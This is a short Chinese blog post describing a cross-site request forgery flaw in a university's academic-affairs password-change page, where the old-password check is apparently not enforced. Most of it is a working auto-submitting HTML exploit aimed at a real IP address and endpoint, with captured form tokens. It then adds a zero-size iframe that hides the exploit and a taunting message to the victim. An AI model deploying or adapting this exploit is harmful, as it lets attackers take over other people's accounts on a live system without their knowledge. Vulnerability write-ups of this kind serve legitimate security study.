偶然在教务处发现csrf漏洞

2019-03-29  本文已影响0人  gelinlang

教务处修改密码界面如下:


1.png

正常情况此处需要输出原密码,不会造成csrf漏洞。
但是此处的原密码是个纸老虎,不需要原来的密码,随便输个123456都行,这里没有检测的。(我们学校程序员居然偷懒!!!)
csrf代码如下:

<html>
  <body onload="document.getElementById('go').submit()">
    <form id="go" action="http://202.115.133.173:805/ModiPassWord.aspx" method="POST">
      <input type="hidden" name="&#95;&#95;VIEWSTATE" value="&#47;wEPDwUJNTM4ODk4MzYyD2QWAmYPZBYCAgMPZBYGZg8WAh4EVGV4dAUJ5Y2T6Iy55p2tZAIBDxYCHwAFDDIwMTYxMzE2MDcxNGQCAg9kFgICAQ9kFghmDxYCHwAFCeWNk&#43;iMueadrWQCAQ8WAh8ABRLnvZHnu5zlronlhajlrabpmaJkAgIPFgIfAAUQMTcwMui9r&#43;S7tuW3peeoi2QCAw8WAh8ABQwyMDE2MTMxNjA3MTRkZM2cZwst9wh6BaCcCBjxJ6n&#43;TrZmpK5wdEoBdJjVxZTV" />
      <input type="hidden" name="&#95;&#95;VIEWSTATEGENERATOR" value="B1C5939B" />
      <input type="hidden" name="&#95;&#95;EVENTVALIDATION" value="&#47;wEdAAVwUaUwO1bgJ7LJU6RWoNWl2bK4eTBGWi2U4IqNVYtL5nDvn2yJ7M75w2K&#47;2upfeT4Bxpy0WPfutMPmI6IniVAxv8qihCTLkiMq5qd7QZvlx7Y3Ca2tb5DJ&#43;zkC2dlIer&#43;LPJBAqtOGGwuhwR4TwYul" />
      <input type="hidden" name="ctl00&#36;Content&#36;txtOldPwd" value="oldpasswd" />
      <input type="hidden" name="ctl00&#36;Content&#36;txtNewPwd" value="newpasswd" />
      <input type="hidden" name="ctl00&#36;Content&#36;txtRPwd" value="newpasswd" />
      <input type="hidden" name="ctl00&#36;Content&#36;btnSubmit" value="" />
    </form>
  </body>
</html>

在登录教务处后访问页面,成功修改密码。

还可以用iframa标签隐藏代码,增加混淆性。

<iframe src="csrf.html" width="0" height="0"></iframe>
<h1 style="color:red ; font-size:50px">还不看下手机,你的QQ密码被我改了</h1>

简单的测试页面如下:

2.png
上一篇 下一篇

猜你喜欢

热点阅读